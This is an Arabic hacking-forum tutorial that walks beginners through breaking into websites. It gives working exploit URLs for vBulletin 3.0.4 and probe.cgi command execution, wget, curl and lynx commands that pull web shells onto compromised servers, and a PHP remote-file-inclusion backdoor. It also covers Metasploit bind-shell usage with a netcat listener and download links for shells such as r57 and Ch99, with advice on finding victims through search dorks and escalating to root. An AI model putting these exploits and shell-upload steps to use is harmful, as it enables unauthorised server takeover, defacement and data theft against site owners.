:::
تطبيق الثغرة المناسبة ,
ورفع الشل Shell ,
وتنفيذ الأوامر المطلوبة ...
شرح هذا تعبة والله عليه علي شانكم وشي ثاني ذكر حقوق الكاتب
الي جمع لكم دروس
والي صحيح يبي يكون هكر يفهم شرح زين لو كام طويل بس مفيد
وكمــا تري ... إن إصدار
3.0.4 من المنتدي يوجد له ثغرتان....
الآن بعد ما نضغط على زر الثغره
vBulletin <= 3.0.4froumdisplay.php"Code Execution ( Part2)
راح يطلع لك التالي ...
و كود
الثغرة بيظهر على حسب الثغره بالـ Perl ولا بالـ php ولا مكتوب الاستغلال على طول من المتصفح كما فى المثال بتاعنا ...
(
وسأوضح بعض الثغرات المختلفة , وكيفية التعامل معها )
المهــــــــم ... راح يطلع الكود التالي ...
Exploit:
--------------
كود PHP:
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
Conditions:
----------------
1st condition : $vboptions['showforumusers'] == True , the admin must set
showforumusers ON in vbulletin options.
2nd condition : $bbuserinfo['userid'] == 0 , you must be an visitor/guest.
3rd condition : $DB_site->fetch_array($forumusers) == True , when you
visit the forums, it must has at least one user show the forum.
4th condition : magic_quotes_gpc must be OFF
SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
init.php by secret array GLOBALS[]=1 ;)))
طيب وش معناه الكلام ذا ؟!,,
يقولك إن الثغره تستغلها عن طريق إضافة الرابط هذا ... كود PHP:
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
وتحط بدال site الموقع المستهدف ومعطيك شروط لاشتغال الثغره ... بس إنت ما عليك منه ... رح طبق وشف وش يصير ...
......... طبعا مو شرط تستخدم هذه الثغره فقط .........
... كل موقع أو كل إصدار وثغراته ...
طيب نروح للمنتدى ونكتب بعده الكود اللي عطانا ...
مثل ما قلنا بالأول إنه فرضاً اسم الموقع
http://www.admin.com/
ولنفرض انك ضغطت على رابط المنتدى وصار اسم المجلد vb يعني صار الرابط
www.admin.com/vb
نضيف الرابط بعده
كود PHP:
http://www.admin.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
وتشوف مكان id ...ونضع مكانه أوامر اللينكس ( وسأشرح كيفية استخدام هذه
الأوامر )
طيب بعد ما كتبت id وطلع لك مثلا ...
uid=100(apache) gid=500(apache) groups=500(apache)
او
uid=100(nobody) gid=500(nobody)
كويس تنفذت
الثغرة ... وعطاك رد وهو ... إن حالتك نو بدي (nobody) على السيرفر ,,,
وإذا ما نفعت
الثغرة دي ... شوف غيرها , وغيرها , وغيرها ووو وابحث فى كل مواقع الـ Security عن ثغرة لهذا الإصدار من المنتدي...
وأكمل شغلك ... وإذا ما لقيت ثغرة لهذا الإصدار من المنتدي ... شوف باقي البرامج , والخدمات ... اللي شغالة... عـ الموقع....
ودور لها علي ثغرات .....
*** فقـــط ... أكمل , وتابع الشرح , وإن شاء الله ... هتعرف كل شئ ببساطة ***
المهـــــــــــــــم !!!
هنفترض إن
الثغرة اشتغلت معانا ....
الحين اكتب pwd ( مكان الـ id ) لمعرفه مكانك على السيرفر ...
كود PHP:
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('pwd')."
لاحظ !!! قمنا بحذف id ( الموجودة فى آخر الكود ... فى المستعرض )وكتابة pwd
وبعد معرفة مكـــانك على السيرفر ... ( يعني إنت موجود الآن فى مجلد إيه !!! ... على السيرفر )
قم بتنفيذ هذا الأمر ls -al عشان تشوف المجلدات والملفات وتصاريحها ودور علي مجلد يحمل تصريح 777 وبتشوف قدامه drwxrwxrwx
هذا على طول تدخله
وتسحب له
الشل بطريقه هذي
cd أمر الدخول
ومثلاً قالك مسارك على السيرفر كذا بعد ما كتبت pwd
/home/domains/admin.com/public_html/vb
وشفت إن مجلد اسمه data يحمل التصريح 777
تروح تكتب الأمر التالي علشان تدخل مجلد الـ data مثلاً
cd home/domains/admin.com/public_html/vb/data
لازم تكتب الأمر اللي فوق وتشبك فيه أمر السحب بعد عشان ينفذ أمرين الدخول و السحب , ويكون بالطريقه هذي,,,
كود PHP:
cd home/domains/admin.com/public_html/vb/data;wget http://members.com/shell.zip;ls -al
لو لاحظتوا كل أمر نفصله بهذي العلامة ; وزدنا أمر استعراض الملفات أيضا ... يعني بينفذ كذا أمر مع بعض ,,, فى وقت واحد....
لاحــــــــــظ!!!
أمر الدخول أو الانتقال لمجلد معين cd +
أمر السحب
wget http://members.com/shell.zip +
أمر الاستعراض ls -al
طبعا إنت تكون رافع
الشل وضاغطه في ملف مضغوط وتسحبه على السيرفر بالطريقه اللي وضحتها
وإذا شفته انسحب ... أوكيه ... إذا ما انسحب تأكد من صلاحية الأمر
wget بكتابه الأمر التالي:::
which wget
إذا عطاك مسار مشابه لهذا
/usr/da/
يعني اوكي شغال .... ((( شغـــال , ولا سواق ... هههههه )))
أو جرب باقي أوامر السحب مثل curl و get و lynx كل هذي تأدي الغرض وتفك مشاكل كثيرة يعانون منها المبتدئين...
جرب الأداة curl
وتسحب بالطريقه هذي...
curl -o shell.zip www.members.com/shell.zip
أو بـ get
بالطريقه التالية :::
GET www.members.com/shell.zip > shell.zip
أو بـ lynx
بالطريقه التالية :::
lynx -source www.members.com/shell.zip > shell.zip
بعد ما سحبته واستعرضت وشفت إن الملف موجود .... تكتب الأمر هذا unzip ... لفك الضغط عن الشل...
cd home/domains/admin.com/public_html/vb/data;unzip shell.zip;ls -al
طبعا لازم تكتب أمر الدخول كل مره ... بس تضيف عليه اي أمر إضافي لأنك تبي تطبق على المجلد اللي يحمل التصريح ...
مش على المجلد اللي إنت فيه
طيب بعد ما فكيت
الشل وصار shell.php
تروح تطلبه من المتصفح وبعدها شوف الموقع قدامك بمكانك ...افعل ما أردت ... عن طريق أوامر اللينكس
( سوف تجد في أسفل الموضوع شرح للـ
Shell + أوامر اللينكس )
وأيضاً ...
اضغط هنـــا لتحميل الكتاب باللغة الإنجليزية اضغط هنـــا لتحميل الكتاب باللغة الإنجليزية
وكده إحنـــا قمنا باستغلال ثغرة من ضمن الثغرات الموجودة في منتدي Vb 3.0.4 ومن خلالها قمنا برفع شل وطبقنا أوامرنا وووو ....
وأيضاً ممكن تستغل ألبوم الصور إذا موجود فى الموقع 4images : وده له ثغرات , وممكن تبحث عنها بنفس الطريقة السابقة ...
وأيضاً ممكن تستغل سجل الزوار : نروح نشوف له ثغرات ؟؟ إذا كان له ثغرات أوكي ... نبحث , ونطبق وإذا ماله انتقل للي بعده...
وأيضاً ممكن تستغل باقي الخدمات الموجودة على الموقع ... وتعمل بحث علي كل برنامج أو ثغرة أو خدمة معينة ... ووو ...
* طبعاً إنت بتشوف الخدمات اللي شغالة علي الموقع أو تعمل عليها Scan مسح كما ذكرنا سابقاً , وبعد كده تروح تبحث علي ثغرات لهذه الخدمات , بنفس طريقة البحث اللي شرحناها *
*******************
والآن !!! سأوضح بعض الثغرات المختلفة , وكيفية التعامل معها ....
( وبإمكانك مراجعة درس استغلال نقاط الضعف + طريقة البحث عن الثغرات فى مواقع الـ Security ... وستجد فيه بعض من أنواع الثغرات
المختلفة + طريقة البحث عنها أيضاً , وكيفية التعامل معهــا )
المهم
بنشرح عمل ثلاث أنواع من الثغرات وهي ما تسمى...
(( Remote command exucetion )) & (( Remote File Inclusion )) & (( Framework ))
وهي تسمح لك برفع شل أو باكدور أو أو أو ,,,,,,الخ
أول حاجه لازم يكون عندك شل
Shell مرفوع بموقعك أو احد المواقع,,,
مثل هذا
الشل الروسي r57 مثلاً , أو Ch99 ... ( سأوضح أنواع
الشل ... + روابط لتحميلها ...لاحقاً )
المهم ...
================================================== =========
================================================== =========
النوع الأول ثغرات Remote command exucetion
================================================== ========
================================================== ========
طيب خلينا نجيب ثغره ونطبق ... وعنوان
الثغرة كذا ...مثــلاً ...
Probe.cgi Remote Command Execution
يعني بملف Probe.cgi فيه ثغره رموت كومند Remote Command حلو ...طيب خلونا نشوف الاكسبلويت
( السورس بتاع
الثغرة .... )
Authors ....... spher3 (spher3 at fatalimpulse dot net)
Date .......... 04-07-2005
Product ....... probe.cgi
Type .......... Remote Command Execution
o Info:
================
That script is used to open file '.dat'.
o Vulnerable Code:
================
..
23 [...]
24 $old = $query->param('olddat');
25 [...]
..
..
34 [...]
35 open (VF, "$olddat");
36 [...]
..
(24) At this line, the cgi param 'olddat' is associated to one database.
This variable isn't checked by anyone matching, so you can open
all file that you want. (35) At this line the script open the file
that you had chosen. With pipe `|`
is possible to execute arbitrary code on the shell.
o Proof of concept:
================
http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
uid=99(www) gid=99(www)
لو تقرأ بأعلى موضح لك الملف ونوع
الثغرة ,,,,, طيب احنا عوزين الاستثمار ...
استثمارها هنا بالسطر ده ...
http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id|
the-vuln.site.org.<<===الموقع المستهدف وهو افتراضي
cgi-bin<<===مجلد الـ cgi-bin
probe.cgi<<===الملف المصاب
olddat<<===مكان الاصابه داخل الملف ومو شرط نفس الاسم ممكن يتغير
===============
طيب نبغى نعرف كيفية عملها اوكي
اولاً ... تسوي بحث بالطريقه هذي
allinurl:probe.cgi
أو اي طريقة تحب
لنفرض اننا حصلنا علي موقع
http://www./???.com/cgi.bin/probe.cgi?grid=ThaiGrid
كويس أول حاجه نضع
|id|
بيطلع بالشكل
www.???.com/cgi.bin/probe.cgi?grid=|id|
واعطيه انتر بيظهر لك مثلا كذا
uid=99(www) gid=99(www)
هذا صفتك ( صلاحيتك ) بالسيرفر
طيب نبغى نعرف مكاننا وين ( يعني احنا في أى مجلد علي السيرفر )
ضع مكان الـ id
pwd
www.???.com/cgi.bin/probe.cgi?grid=|pwd|
بيطلع معك مثلا...
/home/.???/cgi.bin
طيب نبغى نشوف مسموح لينا نرفع ملف ولا لا؟
ضع مكان الـ id
which wget
بالشكل,,,,,,,,,
www.???.com/cgi.bin/probe.cgi?grid=|which wget|
إذا ظهر لك كدا ...
/؟؟؟/؟؟؟/wget
وعلامات الاستفهام متغيرة يعني أهم شئ wget تظهر ... فإذا ظهرت ... فاعرف إن وضعك زي الـفــل...
يعني مسموح لك ترفع ملف ... انبسط ياعم ...
طيب نبغى نعرف التصاريح : permits للمجلدات والملفات عشان نشوف وين المسوح لينا بالرفع
لو ترجع احنا قلنا مكاننا وين هنا
/home/.???/cgi.bin
طيب احنا نبغى نخرج من مجلد cgi.bin للديكويتري ( المجلد ) الرئيسي ... حلو !
نضع مكان الـ id
cd /home/.???/;pwd
يعني بيكون بالشكل
www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;pwd|
الآن بيرجعنا إلى ...
home/.???/
حلو الآن ... نبغى نشوف المجلدات والملفات و التصريحات بالأمر ...
;ls%20-al
بيطلع كذا,,,,,
www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/;ls%20-al|
بتظهر لك ملفات ومجلدات الموقع وأمامهم تصريحاتهم...
إنت ابحث عن المجلد اللي له التصريح
drwxrwxrwx = 777
لنفرض انك حصلت أمام مجلد الصور أو uploads تصريح ( drwxrwxrwx = 777 )
أولا ... لازم تخش عليه ... تعمل
cd home/.???/uploads/;pwd
www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/;pwd|
حلو بيكون وضعك بالشكل
home/.???/uploads/
يعني داخل مجلد uploads
الآن كل ما عليك رفع
الشل ... طبعا لك شل مرفوع بأحد المواقع ... يعني نفترض رابط شيلك Your Shell
www.XXX.com/r57shell.zip
وتبغي ترفعه على الموقع اللي اخترقته ... بيكون بالشكل ده ......
www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/wget
www.XXX.com/r57shell.zip*|
واعطيه انتر Enter بيظهر لك :::
r57shell.zip
طيب نبغى نفك الضغط عنه بالأمر unzip
www.???.com/cgi.bin/probe.cgi?grid=|cd /home/.???/uploads/unzip r57shell.zip*|
وديلو إنتر Enter بيطلع معك :::
r57shell.php
وألف مبروك خش وافتحه بالمتصفح وتمتع وبيكون الرابط
www.???.com/uploads/r57shell.php
( سأشرح ... كيف تتعامل مع
الشل Shell , وكيف تستخدم أوامره , وما الذي تفعله بعد رفع الـ
Shell ... لاحقاً )
================================================== ========================
================================================== ========================
ننتقل للقسم الثاني وهي ثغرات Remote File Inclusion
================================================== ========================
================================================== ========================
الثغرات المسماه Remote File Inclusion شبيهه بعمل Remote Command Execution
بس الفرق يلزم كود لرفعه لموقعك ومن ثم تأخذ رابطه وتستخدمه لاستثمار أو الهجوم
خلونا نأخذ مثال للتوضيح ... ولنأخذ هذه
الثغرة ...مثال :::
الاستغلال :
http://www.target.net/index.php?mode.../evilcode?&cmd
لو تلاحظ بالاستغلال
http://evilcode?&cmd http://evilcode = موقعك
?&cmd = كود مرفوع بموقعك :
**********
افتح النوت باد Notepad وادخل هذا الكود واحفظها باسم cmd.gif
<?
system($cmd);
?>
*/
**********
أنا رافعه على موقعي
http://members.lycos.co.uk/breeeeh/cmd.gif?&cmd=id
وعند الاستغلال
http://www.target.net/index.php?mode...md.gif?&cmd=id
الـ id بالآخر تضع مكانها أوامر اللينكس... ( كما شرحت فى الأعلي )
والفرق بين Remote Command Execution و Remote File Inclusion
أن Remote File Inclusion فيها كود ترفعه على موقعك وتستخدم
الأوامر مكان الآي دي id ((رابط موقعك مع الـ id ))
و Remote Command Execution تستخدم أوامر اللينكس على طول بدون كود مرفوع (( الـ id فقط ))
================================================== ========================
================================================== ========================
ننتقل للقسم الثالث وهي ثغرات مكتوبة بالـ Framework . ( وامتدادها بيكون pm )
================================================== ========================
================================================== ========================
أولاً : حمل برنامج Metasploit Framework من هـنـــا
بعــد تثبيت البرنامج ...
بإمكانك تشغيل البرنامج عـ ( الـ Windows )...
وبالمناسبة ... أوامر البرنامج ثابتة ... سواء فى اللينكس , أو الويندوز ...
ودلوقتي خلونا نشوف شرح للبرنامج , وكيفية استخدامه , من عـ الـ Windows ....
روح لمكان البرنامج ... علي هذا المسار ...
C:Program Files/Metasploit Framework
( إذا كنت الويندوز موجود فى الـ C ) أما إذا كان الويندوز موجود فى الـ D بيكون المسار كالتالي :::
D:Program Files/Metasploit Framework
.............
واضغط على أيقونة البرنامج الموضح بالصورة :::
أو ممكن تذهب إلي قائمة Start ثم Programs ثم Metasploit Framework ثم MSFConsole ...
وبعد ما تضغط على أيقونة البرنامج هاتفتح معك الشاشة ... التالية :::
ونضع ملف
الثغرة اللي احنا عايزنها في هذا المسار...
C:\Program Files\Metasploit Framework\home\framework\exploits
مع ملاحظة :::
الثغرة هاتكون بامتداد ((( pm )))
طبعا ممكن تفتح ملف
الثغرة بالـ Notepad ... وبتلاحظ الاسم بتاع الثغره بأعلى الاكسبلويت...
للتشغيل الثغره اكتب الأمر زي ما هو
use php_vb3_0_6
طيب هنستعرض الخيارات المتاحة لنا للتطبيق بالأمر...
show payloads
ظهر لنا الخيارات وهنختار منها cmd_generic بالأمر...
set PAYLOAD cmd_generic
طيب هنشوف الخيارات التي بداخل الخيار cmd_generic بالأمر
show options
حلو جداً ,,,,,, نستخدم الخيارات بالترتيب بالأوامر
set RHOST server's IP
server's IP <<-------------- آي بي IP ::: الموقع المستهدف
,,,,,,,,,,,,,,
set RPATH /vb/misc.php
vb/misc.php<<-------------مكان الإصابة وهو متغير
,,,,,,,,,,,,,,
وأيضا الأمر...
set RPORT 80
,,,,,,,,,,,,,
وبعده الأمر
set LHOST myIP
myIP<<-------------- الآي بي IP بتاعك
,,,,,,,,,,,,,
وأيضا الأمر
set LPORT 1234
والبورت أنت حٌر ... ممكن تغيره ... بس لازم هو نفسه عند الاتصال بالنت كات
,,,,,,,,,,,,,
والآن ... استخدم أوامر اللينكس بالأمر ...
set CMD id
والآن شوفوا الصورة عند استخدام الأوامر
الآن روح وافتح النت كات وتنصت به ... بالأمر
nc -vv -l -p 1234
لاحظو ... البورت هو نفسه اللي بالأول وضعناه...
,,,,,,,,,,,,,
وأخيراً ... نستخدم الأمر ...
exploit
وانتظر,,,,,هتظهر النتيجة بالنت كات
طبعا الشرح كله كافتراضي للتطبيق على احد الثغرات
المهم نفهم طريقة التطبيق لان فيه ثغرات جميله مكتوبة بالــFramework
*******
وهذا شرح ثاني لثغرة مكتوبة بـ برنامج Metasploit Framework
وطبعاً هي بامتداد pm
واسم
الثغرة ::: futuresoft_tftpd.pm
وهذا هو رابط
الثغرة ( افتحه ) ووو
futuresoft_tftpd_pm.txt
وانسخ كامل كود الاستغلال إلى ملف نصي , ونسمي الملف futuresoft_tftpd.pm
لأن كود الاستغلال يبدأ بـ Msf::Exploit::futuresoft_tftpd ولأن فيه كلمة MsF Exploit تبقي
الثغرة مكتوبة ببرنامج Metasploit Framework
ولازم يكون امتدادها pm ... لذلك احنا كتبنا اسم الملف وأضفنا إليه .pm
futuresoft_tftpd.pm
انسخ الملف futuresoft_tftpd.pm إلى المجلد الخاص بثغرات البرنامج
C:\Program Files\Metasploit Framework\home\framework\exploits
-
والآن شغل Metasploit Framework , من قائمة start ثم Metasploit Framework وشغل MSFConsole
ستبدأ نافذة الدوس Dos في الظهور بشعار Metasploit ,,, نبدأ بتنفيذ الأوامر
1- الأمر الأول use وهو لتحديد اسم
الثغرة التي سنستخدمها وهي futuresoft_tftpd لاحظ بدون pm
بمعنى أول أمر نستخدمه هو : use futuresoft_tftpd وستلاحظ تغير سطر
الأوامر إلى msf futuresoft_tftpd >
لاحظ الصورة:
ثانياً: أمر show أو العرض ينقسم إلى 3 أنواع :::
الأول ::: show options وهو لإظهار وتحديد اختيارات
الثغرة مثل رقم المنفذ Port وعنوان ip
الثاني ::: show payloads لإظهار وتحديد
الشل كود shellcode الذي ستقوم بتنفيذه
الثالث ::: show targets لإظهار الهدف المحدد مثل نظام تشغيل أو
تطبيق ويب مع تحديد الإصدار
نبدأ بأول نقطة : نفذ show options وستلاحظ ظهور 3 خصائص :::
1 SSL وهذا الاختيار لا نستخدمه إلى إذا كان الموقع يستخدم شهادة التحقق https
2 رقم ip و 3 البورت Port وتلاحظ أن البورت محدد 69 ,,, لاحظ كيف سنقوم بإعادة التحديد
لتحديد ip الموقع المستهدف ... سنستخدم أمر جديد وهو set , لاحظ سنحدد ip و port
بهذا الشكل set RHOST 127.0.0.1 و set RPORT 69 لاحظ الصورة
بعد ذلك تحديد payloads أو shellcode ويوفر Metasploit أنواع كثيرة وإحترافية للـ shellcode
لرؤيتها وتحديدها نفذ الأمر show payloads
لاحظ سنقوم باختيار
الشل كود المعروف لفتح منفذ جديد أو باب خلفي للدخول للجهاز وهو win32_bind
نفذ الأمر set PAYLOAD win32_bind لاحظ الصورة التوضيحية:
بعد ذلك تحديد الهدف targets , نفذ الأمر show targets لعرض أنواع الهدف وفي مثالنا
الأهداف المتوفرة :
0 - Windows 2000 Pro English ALL
1 - Windows XP Pro SP0/SP1 Englis
2 - Windows NT SP5/SP6a English
3 - Windows 2003 Server English
ونستطيع تحديد الهدف , لاحظ سنقوم باختيار WinXP sp0/sp1 بمعنى الاختيار 1
بهذا الشكل :::
set TARGET 1
-
وبعد الانتهاء من إعدادات الثغره , نفذ أمر show options , للتأكد من كل الخصائص
بهذا الشكل :::
وبهذا نكون انتهينا وللتطبيق تأكد أن النظام winxp sp0 أو sp1 وأن البرنامج :::
TFTP Server 2000 Evaluation Version 1.0.0.1 شغال عـ الموقع
والآن نفذ الثغره باستخدام الأمر exploit
وبهذا نكون أخذنا فكرة عن أداة أثبتت جدارتها في عالم الأمن وهي Metasploit Framework
ولا تستغرب إذا كان فيه فرق بين الشرح الأول لـ Metasploit Framework والشرح الثاني ...
* فالطريقة الأولي صحيحة , وسهلة ,,, وأيضاً الطريقة الثانية كذلك *
وبالتوفيق للجميع ....
***********************
*************
******
*
$*******$
طيب الحين خلصنا من الاختراق عن طريق السكربتات اللي مركبه على الموقع ,,,
وأيضاً ... اتعرفنا علي بعض الثغرات المهمة جداً , وعرفنا كيف نقوم باستغلالها ...
ننتقل لمرحله أكثر تقدم ....
نروح لموقع netcraft.com
وتكتب في مربع البحث اسم الموقع اللي تبيه...
بيطلع لك معلومات الموقع من الـ IP للموقع والخدمات المركبه على السيرفر ... وهكذا ... ومثلاً عطاك المعلومات التالية :::
202.75.49.183 Linux Apache/1.3.34 Unix mod_ssl/2.8.25 OpenSSL/0.9.7a PHP
/4.4.2 mod_perl/1.29 FrontPage/5.0.2.2510
نأخذه وحده وحده
النظام بيشتغل على Linux
ومركب سيرفر Apache إصدار 1.3.34
أول شي تشوف لينكس وثغراته زي ما تعلمنا قبل كده ...
بعدين انتقل للأباتش ودور له علي ثغرات تناسب الإصدار الموجود ,,, وإذا ما لقيت أو ما ضبط ... انتقل للي بعده...
mod_ssl/2.8.25 مود يتركب على سيرفر الأباتش وشف له ثغرات...
OpenSSL/0.9.7a دور له علي ثغرات
PHP/4.4.2 دور له علي ثغرات
طبعاً ... إنت بتدور علي الثغرات ... بنفس الطريقة اللي قلنا عليها قبل كده ...
عن طريق البحث فى مواقع السيكيورتي....
وعلي فكرة ... لو قدرت تبحث وتطلع ثغرات للخدمات الموجودة علي الموقع مثل : Appache أو OpenSSL/0.9.7a أو mod_ssl/2.8.25 أو أو أو
وعرفت تطبقها ... أعتقد إن إنت كده أصبحت ((( هاكر ::: بدائي ))) يستطيع أن يكون محترف
خلوا بالكوا ... ((( هاكر ::: بدائي ))) وليس محترف ... لأن عالم الاختراق ... ملئ بالاكتشافات... والمواهب , والأفكار الجديدة...
والمحترف ... هو اللي بيكون صاحب هذه الاكتشافات , والمواهب , والأفكار الجديدة ....
$*******$
وهــا هو شرح الـشــــل...
ما هو الشل؟؟؟؟ هو عبارة عن سكربت مكتوب بلغة phpshell ويعمل
الشل كوسيط بينك وبين النظام الذي هو Linux
حيث يستقبل
الأوامر منك ويرسلها إلى السيرفر المخترق وتعرض نتائج
الأوامر على الشل...
والآن ما الفائدة منه؟؟؟ لان الكل يسمع عن
الشل وما يعرف شنو استخداماته؟؟ وأنا أقولك له استخدامات كثيرة
فنحن الهاكرز نستخدمه في السيطرة على السيرفرات ......
والآن جينا للمفيد يستخدم للسيطرة على السيرفر وأحياناً السيطرة بشكل كامل على السيرفر والتنقل بالسيرفر وتصفح ملفاته والتعديل عليها وهذا حسب صلاحياتك على السيرفر
وأكيد راح تقولي شنو صلاحياتي ؟؟ وأنا أقولك الصلاحيات يعني شنو إنت على السيرفر اي شنو موقعك من الإعراب هههههههههه وإليكم أنواع الصلاحيات على السيرفر
1_ Root اي أنت مدير السيرفر يعني خلاص ما في شي يوقف قدامك تحذف تعدل تضيف حساب على السيرفر وكذا ......
2- User هنا صلاحياتك على الموقع اللي إنت رفعت عليه شل فقط ... أكرر على الموقع اللي إنت رفعت عليه شل فقط ...
اي تعدل تعطي تصاريح إلا إذا انتقلت لحالة الرووت
3- nobody, http, apache هنا كلها نفس الشئ ما تقدر تحذف ملفات أو تعطي تصاريح للملفات ولكن هذه الصلاحيات فيها ميزة حلوة وهي
انك تقدر تتصفح الحسابات اللي على السيرفر اي المواقع التي على السيرفر عكس صلاحيات اليوزر حيث صلاحياتك على الموقع اللي إنت رفعت عليه شل فقط
ولكن في سؤال مهم وهي أكيد إنت راح تقولي كيف اعرف صلاحياتي على السيرفر؟؟؟ وأنا أقولك وإنت في
الشل تكتب id لمعرفة صلاحياتك
؛؛؛ وهو أمر لينكس ؛؛؛
درسنا ممل اليوم ههههههههههه اتحملوني يـا شباب أنا أخوكم معلش ...
ومن الكلام اللي سبق أكيد إنت استنجت شئ ... وهو انك حتى تشغل
الشل لازم ترفعه على موقع
وأكيد في سؤال بالطريق وهو كيف ارفع
الشل على موقع؟؟؟
وأنا أقولك ولا يهمك يتم رفع
الشل عن طريق الثغرات وأكيد راح تسأل وتقول وش هي الثغرة؟؟؟؟ وأنا أجاوبك مع انك مللتني من كثر أسألتك ههههههههههه
الثغرة: وهي عبارة عن خطأ برمجي وضعف أمني يساعدك في دخول نظام معين واختراقه .....
وأحيانا تساعدك
الثغرة في الانتقال من حالة إلى أخرى أي مثلا من نوبدي nobody إلى رووت Root حسب نوع
الثغرة .....
والثغرات تكون مكتوبة بلغة السي C أو البيرل Prel أو php الخ.....
والآن الحمد لله عرفتوا شنو
الثغرة ......
ولنفترض إنك تمكنت من رفع شل على موقع ولكن أكيد إنت تبي تعرف أنواع الشل؟؟ وأنا أقولك إنت تأمر ...
بعض الأنواع:
1- webadmin هذا
الشل جيل ومفيد للمبتدئين لأنه يسمحلك برفع الملفات وحذف الملفات وإنشاء مجلد بكل سهولة ولتطبيق أمر معين مثلا
على ملف كل ما عليك هو انك تضغط على المكان الفارغ أمام الملف المراد التعديل عليه واختار اللي تبي تعديل حذف او غيره كذلك تستطيع
حذف مجلد كامل فهو لا يحتاج إلى أوامر لينكس.
http://www.i-saudi.com/lezr.com/webadmin.zip
2- MyShell هذا
الشل جميل ولكن قديم وهو يعتمد على أوامر لينكس ويمكنك معرفة صلاحياتك بجانب الجملة Current User ومعرفة كل المجلدات الذي في المجلد الذي تتصفحه ورابط التحميل للشل
http://www.i-saudi.com/lezr.com/MyShell-1.0.6.zip
3- phpRemoteView شل جميل ومشابه لخصائص
الشل webadmin وكل مجلد تود التعديل عليه استخدم الأسهم المقابلة لها ولكن هذا
الشل فيه ميزة جميلة وهي انك تقدر تفك تشفير الــ md5 الخاصة بالمنتديات.
http://www.i-saudi.com/lezr.com/phpRemoteView.zip
4- phpshell-1.7 شل جميل وشبيه بالشل MyShell مفيد للمبتدئين
http://www.i-saudi.com/lezr.com/phpshell-1.7.zip
5- phpFileManager شل سهل جدا وأوامره واضحة ولا يحتاج إلى شرح
http://www.i-saudi.com/lezr.com/phpF...ager-0.9.3.zip
6- r57shell
الشل الروسي الغني عن التعريف الذي أنا أفضله من بين كل هذه الشلات وهو يحتاج إلى أوامر لينكس ولكن فيه أوامر البحث عن
ملفات الكونفج وأوامر سحب الملفات اي الدوال لسحب الملفات جاهزة كلها وفيه ميزة تحميل ملفات من جهازك إلى الموقع المخترق من خلاله
فقد أضيفت له ثغرات وشغلات جميلة اكتشفها بنفسك ولكن سوف اشرح لكم هذا
الشل في نهاية درسنا الممل هههههههههه
7- phplab شل جميل ولكنه غير عملي ولا انصح المبتدئين به
http://www.i-saudi.com/lezr.com/phplab.zip
8- haexplorer شل أيضا جميل ولكن غير عملي ولا انصح المبتدئين باستخدامه
http://www.i-saudi.com/lezr.com/haexplorer.zip
9- php exploit lab شل أيضا جميل ولكن أيضا لا انصح المبتدئين به
http://www.i-saudi.com/lezr.com/explorer.zip
10- Ch99 شل جميل ورائع وفيه مميزات جميلة وهي إنك تقدر تخترق قاعدة البيانات من خلاله عن طريق الاختيار sql وهذا
الشل يسمحلك
بتطبيق أوامر لينكس ... بالإضافة إلى إمكانية تصفح الملفات من خلاله كما في
الشل webadmin ولكن باختيارات أوسع ...
&&&
والآن الحمد لله الكل عرف
الشل وأنواعه واستخدامه ولكن في سؤالين مفيش حد سألهم...
وهي أني من خلال الشرح تكلمت عن شغلتين وهي التصاريح؟؟؟ودوال سحب الملفات؟؟؟
بالنسبة للتصاريح وأوامر اللينكس فبإمكانك معرفتها من كتاب اللينكس الشامل والذي وضعته قبل ذلك - هنـا -
وبقي شي واحد وهو دوال السحب وسوف اشرحها بالتفصيل في درسنا اليوم ... لاحقا في وقتها.
وشباب أكيد مليتوا وأنا أنصحكم روحوا اشربوا فنجان قهوة وارجعوا ههههههههههه
نكمل ... والآن بعد ما الكل عرف ما هو
الشل وأنواعة واستخداماته ......
راح اشرح لكم
الشل الروسي r57 اللي أنا أفضله بين الشلات Shells الباقية
إليكم شرحه بالصور:
والآن إليكم الشرح حسب الترقيم في الصورة :::
1- phpinfo هنا لمشاهدة البرامج المثبتة على السيرفر ...
2- Safe Mode السيف مود هو حالة آمنة يتم تفعيلها على السيرفر لمنع
تطبيق الدوال.
3- إصدارة اللينكس للسيرفر المخترق مع آخر تحديث له وهو 2005 .
4- id وهو كما ذكرت صلاحياتك على السيرفر وهي هنــا nobody نو بدي .
5- pwd مسارك على السيرفر اي مكان تواجدك .
6- ملفات السيرفر وهي ظاهرة في الصورة واليكم تكملة شرح
الشل شوفوا الصورة:
1- هنا تكتب أمر اللينكس مثلا id لمعرفة صلاحياتك
2- هنا المسار الذي إنت عليه أو اكتب pwd لمعرفة مسارك
3- هنا للتنفيذ اي عند كتابة أمر اللينكس اضغط على هذا المستطيل (بالعربي اكتب الأمر واضغط انتر) مثل هذا الأمـر مثلاً....
cd home/domains/admin.com/public_html/vb/data;wget
http://members.com/shell.zip;ls -al
والآن أشرح لكم دوال سحب الملفات ...
والآن إليكم الشرح وسوف أشرح على الدالة wget ... في البداية كشرح خفيف لمعرفة أن الدالة wget شغالة
يجب كتابة الأمر which wget وشوفوا الصورة:
وكما تلاحظون كتبنا الأمر which wget في مربع تنفيذ
الأوامر ونضغط انتر Enter وشوفوا النتيجة
والآن كما تلاحظون ظهر لنا الرد الذي في الصورة وهو usr/bin/wget/ اي أن الدالة شغالة ,,, والآن نكتب أمر السحب ولكن قبل كل ذلك يجب
أن تتأكد من أن المجلد الذي سوف تسحب
الشل له ؛ يملك التصريح 777 ... شوفوا الصورة :::
كما تلاحظون الاختيارات:
1- هذا هو التصريح 777 الذي يجب أن يكون drwxrwxrwx بدون شرطات كما في الصورة السابقة...
2- هذا هو المجلد الذي سوف نسحب ( = نرفع عليه ) الملف الذي نريد...
والآن كل شي جاهز ... المجلد ذو التصريح , والملف الذي سوف نسحبه ...
وأنا هنا سوف اسحب
الشل ch99 للتوضيح لا أكثر ... ويمكن إنت بهذه الطريقة أن تسحب الإندكس Index الخاصة بالاختراق ...
أو أي شي آخر ... والآن اكتب في مكان تنفيذ
الأوامر wget
http://www.site.com/shell.zip
